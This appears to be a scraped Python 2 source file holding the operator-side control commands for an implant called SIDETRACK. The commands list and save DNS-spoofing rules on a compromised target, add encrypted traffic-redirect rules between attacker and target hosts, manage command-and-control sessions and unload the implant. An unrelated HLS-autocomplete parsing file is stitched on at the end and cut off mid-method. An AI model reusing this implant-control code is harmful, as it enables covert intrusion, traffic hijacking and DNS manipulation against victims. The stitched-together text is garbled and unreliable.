self.nlen, self.dlen) =\
struct.unpack("!lLLLLLLHHLHHHHHH", self.data[0:48])
self.dnsname = self.data[48:48+(self.nlen)]
self.dnsdata = self.data[48+(self.nlen):48+(self.nlen)+(self.dlen)]
else:
(self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\
self.lastIP, self.lastTime, self.seen, self.flag, self.lastport, \
self.dnsflags, self.ttl, self.rtype, self.rclass, self.rsec, \
self.nlen, self.dlen) =\
struct.unpack("!lLLLLLLHHHHLHHHHH", self.data[0:50])
self.dnsname = self.data[50:50+(self.nlen)]
self.dnsdata = self.data[50+(self.nlen):50+(self.nlen)+(self.dlen)]
def GetRuleString(self):
printOut = "%10d %s/%s %-7s %s\n" % \
(self.rule,
self.ConvertToDot(self.fromIP),
self.ConvertToDot(self.fromMask),
self.FlagConvert(self.flag),
time.ctime(self.longevity+self.implant.timediff)[4:])
printOut = printOut + " %5s: %-5d %s:%d %s\n" %\
("count",
self.seen,
self.ConvertToDot(self.lastIP),
self.lastport,
time.ctime(self.lastTime + self.implant.timediff))
return printOut + self.GetSectionString()
def GetRule(self,rule,sec=0):
sec = self.ConvertSection(sec)
#print "Getting section %d of rule %d\n" % (sec,rule)
self.data = struct.pack("!LLH",rule,0,sec)
self.Query()
if self.op == 0x22L and self.res == 0x01L:
self.ParseReturn()
printOut = self.GetRuleString()
return (1, printOut)
else:
return (0,"Error receiving result\n")
def GetNextRule(self,lastRule,sec=0):
sec = self.ConvertSection(sec)
print "Getting section %d of rule after %d\n" % (sec,lastRule)
self.data = struct.pack("!LLH",0,lastRule,sec)
self.Query()
if self.op == 0x22L and self.res == 0x01L:
self.ParseReturn()
if self.retVal == 0:
lastRule = self.rule
elif self.retVal == 2:
lastRule = -2
else:
lastRule = -1
if lastRule == -2:
lastRule = -1
printOut = 'There are currently no rules'
else:
printOut = self.GetRuleString()
return (lastRule, printOut)
elif lastRule == 0:
print self.res
return (0,"There are currently no rules!")
else:
return (0,"Error receiving result\n")
def GetSectionString(self):
printOut = " %5s: %-5s %-3s %-5d " % \
(self.SectionConvert(self.rsec),
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.ttl&0xffffffL)
if self.nlen:
try:
printOut = printOut + "%s\n" % \
(self.NameConvertName(self.dnsname))
except:
printOut = printOut + "\n N: %s\n" %\
(self.HexConvert(self.dnsname,10))
if self.dlen:
if self.rtype == 1 and self.dlen == 4:
printOut = printOut + \
" D: %s\n" % \
(self.ConvertToDot(self.dnsdata))
else:
printOut = printOut + \
" D: %s\n" %\
(self.NameConvert(self.dnsdata,10))
return printOut
def GetSection(self,rule,section):
print "Getting section %d of rule %d\n" % (section,rule)
self.data = struct.pack("!LLH",rule,0,section)
self.Query()
if self.op == 0x22L and self.res == 0x01L:
self.ParseReturn()
if self.rsec == 4:
return (1, '')
return (1,self.GetSectionString())
else:
return (0, "Could not get section")
def preRuleString(self):
return "-----------------------------------------------------------------------\n"
def postRuleString(self):
return ''
def runAll(self):
moreRules = 1
lastRule = 0
printOut = ''
while moreRules:
res = self.GetNextRule(lastRule)
if res[0] == 0:
return res
elif res[0] == -1:
moreRules = 0
lastRule = self.rule
else:
lastRule = res[0]
printOut = printOut + self.preRuleString()
printOut = printOut + res[1]
for i in range(1,4):
sec = self.GetSection(lastRule, i)
if sec[0] == 0:
return (0, printOut)
printOut = printOut + sec[1]
printOut = printOut + self.postRuleString()
return (1, printOut)
def run(self,rule=-1, sec=-1, ext=-1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if rule == -1:
lastRule = 0
moreRules = 1
printOut = ''
while moreRules:
res = self.GetNextRule(lastRule)
if res[0] == 0:
return res
elif res[0] == -1:
moreRules = 0
lastRule = self.rule
else:
lastRule = res[0]
printOut = printOut + res[1]
elif rule == "-v":
if sec == -1:
return self.runAll()
else:
if ext == -1:
res = self.GetRule(sec)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(sec, i)
if sd[0] == 0:
return (0, printOut)
printOut = printOut + sd[1]
else:
return self.GetRule(sec,ext)
else:
if sec == -1:
return self.GetRule(rule)
else: # Rule != 0 and sec != -1
return self.GetRule(rule,sec)
return (1,printOut)
##########################################################################
# DNSSAVE class
#########################################################################
class SIDECMD_DNSSAVE(SIDECMD_DNSLIST):
def __init__(self):
SIDECMD_DNSLIST.__init__(self)
self.name = "dnssave"
self.usage = "dnssave [rule] [filename]"
self.info = "Save one of more rules"
def ToOct(self, data):
if type(data) == type(0x0L) or type(data) == type(0):
ret = ''
if data > 255:
if data > 65535:
if data > 16777215:
ret = ret + "\\%o" % ((int)(data/16777216)&0xffL)
ret = ret + "\\%o" % ((int)(data/65536)&0xffL)
ret = ret + "\\%o" % ((int)(data/256)&0xffL)
ret = ret + "\\%o" % (data & 0xffL)
else:
            reg = re.compile("^[a-zA-Z0-9-_.]*$")
ret = ''
for i in range(len(data)):
if reg.match(data[i:i+1]) != None:
ret = ret + data[i:i+1]
else:
ret = ret + "\\%o" % \
struct.unpack("!H",'\000'+data[i:i+1])[0]
return '"' + ret + '"'
def NameConvertName(self, name):
        reg = re.compile("^[a-zA-Z0-9-_.]*$")
ret = ''
sp = 0
if type(name) != type(0):
while name[sp:sp+1] != '\000':
namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
#print namelen
if sp != 0:
ret = ret + '.'
for i in range(1,namelen+1):
if reg.match(name[sp+i:sp+i+1]) != None:
ret = ret + name[sp+i:sp+i+1]
else:
raise TypeError, self.ToOct(name)
sp = sp+1+namelen
return ret
def NameConvert(self, name, padding=0):
try:
return self.NameConvertName(name)
except:
return self.ToOct(name)
def GetSectionString(self):
printOut = "%s %s %s %s %d " % \
(self.SectionConvert(self.rsec),
self.NameConvert(self.dnsname),
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.ttl&0xffffffL)
if self.dlen:
if self.rtype == 1 and self.dlen == 4:
printOut = printOut + self.ConvertToDot(self.dnsdata)
else:
printOut = printOut + self.NameConvert(self.dnsdata,10)
return printOut + '\n'
def GetRuleString(self):
printOut = "rule %s %s %d %s %s %s 0x%04x\n" % \
(self.ConvertToDot(self.fromIP),
self.ConvertToDot(self.fromMask),
self.longevity - self.rule,
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.NameConvert(self.dnsname),
self.dnsflags)
return printOut
def preRuleString(self):
return "# -----------------------------------------------------------------------\n"
def postRuleString(self):
return "set %s\n" % (self.FlagConvert(self.flag))
def run(self,rule=-1, file=-1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if rule == -1: # All Rules to stdout
return self.runAll()
elif type(rule) == type(''): # All rules to file
out = open(rule,'w')
res = self.runAll()
if res[0] == 0:
return res
out.write(res[1])
out = None
return res
elif file == -1: # Single rule to stdout
res = self.GetRule(rule)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(rule,i)
if sd[0] == 0:
return (0,printOut + sd[1])
printOut = printOut + sd[1]
return (1,printOut + self.postRuleString())
else: # Single rule to file
out = open(file,"w")
res = self.GetRule(rule)
if res[0] == 0:
return res
printOut = res[1]
for i in range(1,4):
sd = self.GetSection(rule,i)
if sd[0] == 0:
return (0,printOut + sd[1])
printOut = printOut + sd[1]
printOut = printOut + self.postRuleString()
out.write(printOut)
out = None
return (1,printOut)
#############################################################################
# REDIRADD class
# opcode 0x23
#############################################################################
class SIDECMD_REDIRADD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "rediradd"
self.usage = "rediradd <protocol | all> <host_A> <host_B> [-insert <rule>]\n [-ttl (reset | <num>)] [-nocrypto] [-afix] [-tfix] [-samesum]\n [-longevity <time>] [-conntimeout <time>]\n\n <host_A>/<host_B> format: <ip_address>[:<local_port>/<remote_port>]\n"
self.info = "Add a REDIRECT rule into SIDETRACK's rule set"
self.op = 0x23L
def parseProto(self,proto):
origproto = proto
if type(proto) == type ('a'):
proto = string.upper(proto)[:1]
if proto == "T":
proto = 6
elif proto == "U":
proto = 17
elif proto == "I":
proto = 1
elif proto == "A":
proto = 0
else:
raise ValueError, origproto
return proto
def parseHostInfo(self,host):
#split the ip from the ports
res = string.split(host,":")
if len(res) == 1:
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,-1,-1
elif len(res) == 2:
ports = string.split(res[1],"/")
if len(ports) != 2:
raise ValueError, host
if ports[0] == "*":
ports[0] = -1
else:
ports[0] = eval(ports[0])
if ports[1] == "*":
ports[1] = -1
else:
ports[1] = eval(ports[1])
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,ports[0],ports[1]
else:
raise ValueError, host
def run(self,protocol,attacker,target,
opt0=None,opt1=None,opt2=None,opt3=None,opt4=None,opt5=None,
opt6=None,opt7=None,opt8=None,opt9=None,first=1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg,0)
optList = [opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9]
allProtoAT = 0
allProtoTA = 0
allRedir = 0
ttl_reset = 1
ttl_mod = 0
munge = 1
encrypt = 0
afix = 1
tfix = 1
ident = 0
seq = 0
insert = 0
samesum = 0
longevity = 14400
conn_to = 14400
cmd = None
localredir = 0
if first:
munge = 0
encrypt = 1
protocol = self.parseProto(protocol)
if protocol == 0:
allRedir = 1
host,A_ip,A_port,SA_port = self.parseHostInfo(attacker)
host2,T_ip,T_port,ST_port = self.parseHostInfo(target)
if host != None:
hpn = host.implant.parent.name
myname = host.name
attacker = re.sub(myname,hpn,attacker)
cmd = host.GetCommand('rediradd')
res = cmd.run(protocol,attacker,\
"%s:%d/%d"%(self.implant.session.target.ip,SA_port,A_port),\
opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9,0)
if res[0] == 0:
return res
if res[2] != 0 and cmd.implant.session.target.hasAnotherAddress == 1:
A_ip = struct.pack("!L",res[2])
if SA_port == -1 and T_port != -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if SA_port != -1 and T_port == -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if ST_port == -1 and A_port != -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if ST_port != -1 and A_port == -1:
base.db(1,"problem")
raise ValueError, "Invalid ports"
if SA_port == -1 and T_port == -1:
allProtoAT = 1
SA_port = 0
T_port = 0
if ST_port == -1 and A_port == -1:
allProtoTA = 1
ST_port = 0
A_port = 0
# Parse the args
i=0
while i < len(optList):
if optList[i] == None:
break
elif string.upper(optList[i])[:3] == '-TT':
i = i+1
if type(optList[i]) == type(1):
ttl_mod = optList[i]
if optList[i] < 0:
ttl_reset = 0
else:
ttl_reset = 1
elif string.upper(optList[i])[:1] == 'R':
ttl_mod = 0
ttl_reset = 1
elif optList[i][0] == '+' or optList[i][0] == '-':
ttl_mod = eval(optList[i])
ttl_reset = 0
else:
raise ValueError, optList[i]
#if ttl_reset == 0:
# ttl_mod = struct.pack("!H",ttl_mod)
#else:
# ttl_mod = struct.pack("!h",ttl_mod)
elif string.upper(optList[i])[:2] == '-I':
i = i+1
insert = optList[i]
elif string.upper(optList[i])[:2] == '-L':
i = i+1
longevity = self.ConvertTime(optList[i])
elif string.upper(optList[i])[:2] == '-C':
i = i+1
conn_to = self.ConvertTime(optList[i])
elif string.upper(optList[i])[:2] == '-N':
munge = 0
encrypt = 0
elif string.upper(optList[i])[:2] == '-E':
encrypt = 1
elif string.upper(optList[i])[:2] == '-A':
afix = 0
elif string.upper(optList[i])[:3] == '-TF':
tfix = 0
elif string.upper(optList[i])[:2] == '-S':
samesum = 1
else:
raise ValueError, optList[i]
i = i + 1
if T_ip == self.ConvertIP(self.implant.session.target.ip):
encrypt = 0
munge = 0
localredir = 1
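        # Flag word layout (editor's annotation, LSB first): bit0 active,
        # bit1 afix, bit2 tfix, bit3 ttl_reset, bit4 encrypt, bit5 munge,
        # bit6 all-protocol, bit7 all-ports A->T, bit8 all-ports T->A,
        # bit9 CC support, bit10 samesum.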
flags = 1 | afix << 1 | tfix << 2 | ttl_reset << 3 \
| encrypt << 4 | munge << 5 | allRedir << 6 | allProtoAT << 7 \
| allProtoTA << 8 | base.ccSupport << 9 | samesum << 10
rd = crypto.GetRandom()
if localredir == 0:
ident = struct.unpack("!H",rd[0:2])[0]
if munge:
munge = struct.unpack("!L",rd[2:6])[0]
if munge & 1L == 0:
munge = munge + 1
if munge & 0xffL == 1:
munge = munge + 10
if protocol == 6 and localredir == 0 and encrypt:
seq = struct.unpack("!L", rd[22:26])[0]
if encrypt:
encrypt = struct.unpack("!LLLL",rd[6:22])
else:
encrypt = (0,0,0,0)
base.db(2, seq)
base.db(2, ident)
self.redir =REDIRECT(self,insert,longevity,conn_to,protocol,A_ip,T_ip,\
ident,seq,munge,encrypt,ttl_mod,flags,\
A_port,SA_port,T_port,ST_port)
ruleRes = self.redir.add()
if ruleRes[0] and cmd != None:
if cmd.redir != None:
cmd.redir.next = self.redir
self.redir.prev = cmd.redir
return ruleRes
#############################################################################
# REDIRLIST class
# opcode 0x24
#############################################################################
class SIDECMD_REDIRLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirlist"
self.usage = "redirlist [rule]"
self.info = "List redirect entries."
self.op = 0x24L
def parseReturn(self):
self.ret, self.rule, self.longevity, self.conn_to, \
self.A_ip, self.T_ip, self.flags = \
struct.unpack("!LLLLLLH",self.data[:26])
self.ttl_mod = struct.unpack("!H",'\000'+self.data[26:27])[0]
self.protocol = struct.unpack("!H", '\000'+self.data[27:28])[0]
self.conns, self.ATcount, self.TAcount, self.seen, self.munge, \
self.A_port, self.SA_port, self.T_port, self.ST_port, \
self.seq = struct.unpack("!LLLLLHHHHL",self.data[28:60])
self.A_ip = self.ConvertToDot(self.A_ip)
self.T_ip = self.ConvertToDot(self.T_ip)
self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
if self.protocol == 1:
self.protocol = "ICMP"
elif self.protocol == 6:
self.protocol = "TCP"
elif self.protocol == 17:
self.protocol = "UDP"
elif self.protocol == 0:
self.protocol = "ALL"
else:
            self.protocol = '%d' % (self.protocol)
if (self.flags & 0x1L):
self.active = "ACTIVE"
else:
self.active = "INACTIVE"
self.opts = ''
if not (self.flags & 0x2L):
self.opts = self.opts + '-afix '
if not (self.flags & 0x4L):
self.opts = self.opts + '-tfix '
if (self.flags & 0x400L):
self.opts = self.opts + '-samesum '
if self.flags & 0x8L:
if self.ttl_mod == 0:
self.opts = self.opts + '-ttl reset '
else:
self.opts = self.opts + '-ttl %d ' % (self.ttl_mod)
else:
if self.ttl_mod > 127:
self.opts = self.opts + '-ttl %d' % (self.ttl_mod-256)
else:
self.opts = self.opts + '-ttl +%d ' % (self.ttl_mod)
if not (self.flags & 0x30L):
self.opts = self.opts + '-nocrypto '
def outputPorts(self,attacker,flags,ip,lport,rport):
if flags & 0x40 or flags & 0x180 == 0x180:
return ip
if attacker and flags & 0x80:
rport = '*'
if attacker and flags & 0x100:
lport = '*'
if not attacker and flags & 0x80:
lport = '*'
if not attacker and flags & 0x100:
rport = '*'
if type(lport) != type('*'):
lport = '%d' %(lport)
if type(rport) != type('*'):
rport = '%d' %(rport)
return '%s:%s/%s' % (ip,lport,rport)
def outputCurrent(self):
res = '%-5d %s Connection timeout: %s Expires: %s\n' % \
(self.rule,self.active,\
self.TimeConvert(self.conn_to),self.longevity)
res = res + ' %s %s %s %s\n' % \
(self.protocol,
self.outputPorts(1,self.flags,self.A_ip,self.A_port,self.SA_port),
self.outputPorts(0,self.flags,self.T_ip,self.T_port,self.ST_port),
self.opts)
res = res + ' Connections: %-4d Last seen %s\n A->T count: %-6d T->A count: %-6d\n' % (self.conns, time.ctime(self.seen-self.implant.timediff)[4:], self.ATcount, self.TAcount)
return (1, res)
def listOne(self,rule):
self.data = struct.pack("!LL",rule,0)
self.Query()
if self.op == 0x24L and self.res == 0x01L:
self.parseReturn()
return self.outputCurrent()
else:
return (0, "Implant did not return a valid response")
def listAll(self):
out = ''
self.ret = 1
self.rule = 0
while self.ret == 1:
self.data = struct.pack("!LL",0,self.rule)
self.Query()
if self.op == 0x24L and self.res == 0x01L:
self.parseReturn()
res = self.outputCurrent()
if res[0] == 0:
return res
else:
out = out + res[1]
else:
return (0, "Error receiving result")
if self.ret == 2:
return (1, "No rules to list")
else:
return (1, out)
def run(self,rule=None):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
if rule == None:
res = self.listAll()
else:
res = self.listOne(rule)
return res
#############################################################################
# REDIRSET class
# opcode 0x25
#############################################################################
class SIDECMD_REDIRSET(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirset"
self.usage = "redirset <rule|all> <active|inactive>"
self.info = "Set a redirect rule as being active or inactive."
self.op = 0x25L
def run(self, rule, status):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
if string.upper(status[:1]) == 'A':
status = 1
elif string.upper(status[:1]) == 'I':
status = 0
i=0
while i < len(self.implant.rules):
if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
res = self.implant.rules[i].set(status)
if res[0] == 0:
return res
elif rule != 0:
break
i = i + 1
base.db(3,res[1])
if i == len(self.implant.rules) and rule != 0:
return (0, "Rule does not exist")
else:
return (1, "Rule(s) set successfully")
#############################################################################
# CONNREMOVE class
# opcode 0x28
#############################################################################
class SIDECMD_CONNREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connrm"
self.usage = "connrm <rule|all>"
self.info = "Remove a connection entry (or all connection entries)"
self.op = 0x28L
def run(self, rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x28L and self.res == 0x1L:
return (1, "Connection(s) removed successfully")
else:
return (0, "Error removing connection(s)")
#############################################################################
# CONNLIST class
# opcode 0x27
#############################################################################
class SIDECMD_CONNLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connlist"
self.usage = "connlist [-c <rule> | -r <redir>]"
self.info = "Lists a (or all) connection rules"
self.op = 0x27L
def convertState(self,state):
if state == 0:
return "INIT"
elif state == 1:
return "SYN_SENT"
elif state == 2:
return "SYN_RCVD"
elif state == 3:
return "SYN_ACK_RCVD"
elif state == 4:
return "SYN_ACK_SENT"
elif state == 5:
return "ESTABLISHED"
elif state == 6:
return "FIN_SENT"
def parseReturn(self):
self.ret,self.rule,self.redir,self.longevity = struct.unpack("!LLLL",self.data[0:16])
self.protocol = struct.unpack("!H", '\000'+self.data[16:17])[0]
sendstate = struct.unpack("!H",'\000'+self.data[17:18])[0]
recvstate = struct.unpack("!H",'\000'+self.data[18:19])[0]
sender = struct.unpack("!H",'\000'+self.data[19:20])[0]
self.at_cnt, self.ta_cnt, self.last, self.Aip, self.SAip, self.Tip,\
self.STip, self.Aport, self.SAport, self.Tport, self.STport \
= struct.unpack("!LLLLLLLHHHH",self.data[20:56])
self.leftState = ''
self.rightState = ''
if self.protocol == 6:
self.protocol = "TCP"
if sender == 1:
self.leftState = self.convertState(sendstate)
self.rightState = self.convertState(recvstate)
else:
self.leftState = self.convertState(recvstate)
self.rightState = self.convertState(sendstate)
elif self.protocol == 17:
self.protocol = "UDP"
else:
self.protocol = '%d' %(self.protocol)
def outputCurrent(self):
res = '%d %s Redir rule: %d Last seen: %s\n %s:%d <-%s(%d)-> %s:%d\n %s:%d <-%s(%d)-> %s:%d\n' % \
(self.rule,self.protocol,self.redir,
time.ctime(self.last+self.implant.timediff)[4:],
self.ConvertToDot(self.Aip),self.Aport,
self.leftState,self.at_cnt,
self.ConvertToDot(self.SAip),self.SAport,
self.ConvertToDot(self.STip),self.STport,
self.rightState,self.ta_cnt,
self.ConvertToDot(self.Tip),self.Tport)
return (1,res)
def listAll(self,redir):
out = ''
self.ret = 1
self.rule = 0
while self.ret == 1:
self.data = struct.pack("!LLL",0,self.rule,redir)
self.Query()
if self.op == 0x27L and self.res == 0x01L:
self.parseReturn()
res = self.outputCurrent()
if res[0] == 0:
return res
else:
out = out + res[1]
else:
return (0, "Error receiving result")
if self.ret == 2:
return (1,"No connections to list")
else:
return (1,out)
def listOne(self,rule):
self.data = struct.pack("!LLL",rule,0,0)
self.Query()
if self.op == 0x27L and self.res == 0x01L:
self.parseReturn()
return self.outputCurrent()
else:
return (0, "Implant did not return a valid response")
def run(self, option=None, value=None):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
rule = 0
redir = 0
if option != None:
if option == '-c':
rule = value
elif option == '-r':
redir = value
else:
raise TypeError, option
if rule == 0:
res = self.listAll(redir)
else:
res = self.listOne(rule)
return res
#############################################################################
# REDIRREMOVE class
# opcode 0x26
#############################################################################
class SIDECMD_REDIRREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "redirrm"
self.usage = "redirrm <rule|all>"
self.info = "Remove a redirect rule (or all redirect rules)"
self.op = 0x26L
def run(self, rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
removed = 0
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
i = 0
while i < len(self.implant.rules):
if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
res = self.implant.rules[i].remove()
if res[0] == 0:
return res
removed = 1
i = i - 1
i = i + 1
if removed == 0 or rule == 0:
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x26L and self.res == 0x1L:
return (1, "Rule(s) removed successfully")
else:
return (0, "Error removing rule(s)")
else:
return res
#############################################################################
# CCLIST class
# opcode 0x29
#############################################################################
class SIDECMD_CCLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "cclist"
self.usage = "cclist"
self.info = "List all of the command and control sessions"
self.op = 0x29L
def parseReturn(self):
self.more,self.rule,self.longevity,self.srcip,self.dstip,\
self.srcport,self.dstport = struct.unpack("!LLLLLHH",self.data[0:24])
if self.more & 2L:
self.current = "(CURRENT) "
else:
self.current = ""
self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
self.srcip = self.ConvertToDot(self.srcip)
self.dstip = self.ConvertToDot(self.dstip)
def displayCurrent(self):
# STUB: Make this better!
if self.rule == 0xffffffffL:
return ""
res = "%d %s%s:%d<->%s:%d Expires: %s\n" % \
(self.rule,self.current,self.srcip,self.srcport,\
self.dstip,self.dstport,self.longevity)
return res
def run(self):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
res = ""
last = 0L
self.more = 1
while self.more & 1L:
self.data = struct.pack("!L",last)
self.Query()
if self.op == 0x29L and self.res == 0x1L:
self.parseReturn()
res = self.displayCurrent() + res
last = self.rule
else:
return (0, "Error getting CC rules")
return (1,res)
#############################################################################
# CCREMOVE class
# opcode 0x2a
#############################################################################
class SIDECMD_CCREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "ccremove"
self.usage = "ccremove <rule>"
self.info = "Remove a command and control session (see also: done)"
self.op = 0x2aL
def run(self,rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
self.data = struct.pack("!L",rule)
self.Query()
if self.op == 0x2aL and self.res == 0x1L:
return (1, "Session removed successfully")
else:
return (0, "Unable to remove CC session (note: you cannot remove yourself, see: done)")
#############################################################################
# UNLOAD class
# opcode 0x30
#############################################################################
class SIDECMD_UNLOAD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "stunload"
self.usage = "stunload <magic>"
self.info = "Remove SIDETRACK from the target"
self.op = 0x30L
def run(self, magic):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if self.implant.version < 2.0:
return (0, "This feature is only available in versions >= 2.0")
self.data = struct.pack("!L",magic);
self.Query()
if self.op == 0x30L and self.res == 0x1L:
return (1, "SIDETRACK successfully removed from target")
else:
return (0, "Cannot remove SIDETRACK");
base.RegisterImplant('SIDETRACK', SIDETRACK)
class REDIRECT(SIDECMD):
def __init__(self, cmd, next, longevity, connection_timeout, protocol,\
A_ip, T_ip, ident, seq, munge, crypto_key, ttl_mod, flags, \
A_port, SA_port, T_port, ST_port):
SIDECMD.__init__(self)
self.protocol = cmd.protocol
self.implant = cmd.implant
self.session = cmd.implant.session
self.target = cmd.implant.session.target
self.longevity = longevity
self.nextRule = next
self.connection_timeout = connection_timeout
self.proto = protocol
self.A_ip = A_ip
self.T_ip = T_ip
self.ident = ident
self.seq = seq
self.munge = munge
self.crypto_key = crypto_key
self.ttl_mod = ttl_mod
self.flags = flags
self.A_port = A_port
self.SA_port = SA_port
self.T_port = T_port
self.ST_port = ST_port
self.added = 0
self.localRuleNum = None
self.remoteRuleNum = None
self.prev = None
self.next = None
self.ccPassthru = None
def remove(self,direction=0):
if self.added == 0:
return (0, "Rule does not exist")
if self.ccPassthru != None:
cmd = self.ccPassthru.GetCommand('done')
cmd.run()
if direction != 1 and self.next != None:
res = self.next.remove(2)
if res[0] == 0:
return (res[0], "Rule could not be removed: " + res[1])
self.next = None
if self.remoteRuleNum != None:
self.op = 0x26L
self.data = struct.pack("!L",self.remoteRuleNum)
self.Query()
if self.op == 0x26L and self.res == 0x1L:
base.redir.delete(self.localRuleNum)
self.added = 0
self.localRuleNum = None
self.implant.rules.remove(self)
if direction != 2 and self.prev != None:
res = self.prev.remove(1)
if res[0] == 0:
return (0,"Rule %d removed: %s"%(self.remoteRuleNum,res[1]))
return (1, "Rule %d removed"%(self.remoteRuleNum))
else:
return (0, "Rule could not be removed")
else:
base.redir.delete(self.localRuleNum)
return (1, "Local rule removed")
def set(self,value,direction=0):
if self.added == 0:
return (0, "Rule does not exist")
if direction != 1 and self.next != None:
res = self.next.set(value,2)
if res[0] == 0:
return(res[0], "Rule could not be set: " + res[1])
if self.remoteRuleNum:
self.op = 0x25L
self.data = struct.pack("!LH",self.remoteRuleNum, value)
self.Query()
if self.op == 0x25L and self.res == 0x1L:
base.redir.set(self.localRuleNum, value)
if direction != 2 and self.prev != None:
res = self.prev.set(value,1)
if res[0] == 0:
return (0,"Rule %d set: %s"%(self.remoteRuleNum,res[1]))
return (1, "Rule %d set"%(self.remoteRuleNum))
else:
return (0, "Rule could not be set")
else:
base.redir.set(self.localRuleNum, value)
return (1, "Local rule set")
def add(self, addremote=1):
if self.added == 1:
return (0, "Rule already exists", 0)
AT_ip = 0
if addremote:
self.op = 0x23L
self.data = struct.pack("!LLL",self.nextRule, self.longevity,\
self.connection_timeout)
self.data = self.data + self.A_ip + self.T_ip
self.data = self.data + struct.pack("!HHLLLLLHHHHHHL",self.flags,\
(self.ttl_mod << 8 | self.proto), self.munge,\
self.crypto_key[0],self.crypto_key[1],self.crypto_key[2],\
self.crypto_key[3], self.ident, 0, self.A_port, \
self.SA_port, self.T_port, self.ST_port, self.seq)
self.Query()
if self.op == 0x23L and self.res == 0x01L:
self.remoteRuleNum = struct.unpack("!L", self.data[0:4])[0]
AT_ip = struct.unpack("!L", self.data[4:8])[0]
self.ST_ip = self.data[4:8]
res = base.redir.redir(self.longevity,self.connection_timeout,\
self.ConvertIP(self.target.ip), \
self.T_ip,\
self.seq, self.munge, self.crypto_key, \
self.flags, self.A_port, self.SA_port,\
self.ident, self.proto)
if res < 1:
self.op = 0x26L
self.data = struct.pack("!L",self.remoteRuleNum)
self.Query()
if self.op == 0x26L and self.res == 0x1L:
self.remoteRuleNum = None
return (0, "Local rule could not be added", AT_ip)
else:
return (0, "Local rule could not be added, remote rule may still exist", AT_ip)
self.localRuleNum = res
self.added = 1
self.implant.rules.append(self)
return (self.remoteRuleNum, "Rule %d added" %(self.remoteRuleNum), AT_ip)
else:
return (0, "Remote rule could not be added", AT_ip)
else:
self.remoteRuleNum = None
res = base.redir.redir(self.longevity,self.connection_timeout,\
self.ConvertIP(self.target.ip), \
self.T_ip,\
self.seq, self.munge, self.crypto_key, \
self.flags, self.A_port, self.SA_port,\
self.ident, self.proto)
if res < 1:
return (0, "Local rule could not be added", 0)
self.added = 1
self.localRuleNum = res
return (1, "Local rule added", 0)
|
unlicense
| 5,147,977,936,728,221,000
| 35.501265
| 289
| 0.462023
| false
| 3.780741
| false
| false
| false
|
simondolle/hls-autocomplete
|
hls_autocomplete/parse.py
|
1
|
5470
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import datetime
from time import strptime
import re
import os
import json
class FileStatus(object):
def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None):
self.path = path
self.rights = rights
self.nbFiles = nbFiles
self.owner = owner
self.group = group
self.size = size
self.date = date
self.relpath = relpath
def __eq__(self, other):
return (self.path == other.path and self.rights == other.rights and
self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and
self.size == other.size and self.date == other.date)
def is_dir(self):
return self.rights.startswith("d")
def __str__(self):
return self.to_str(0, 0, 0, 0, 0, 0, 0)
def to_str(self, rights_width, nbFiles_width, owner_width, group_width, size_width, date_width, path_with):
        if self.is_dir():
nb_files = "-"
else:
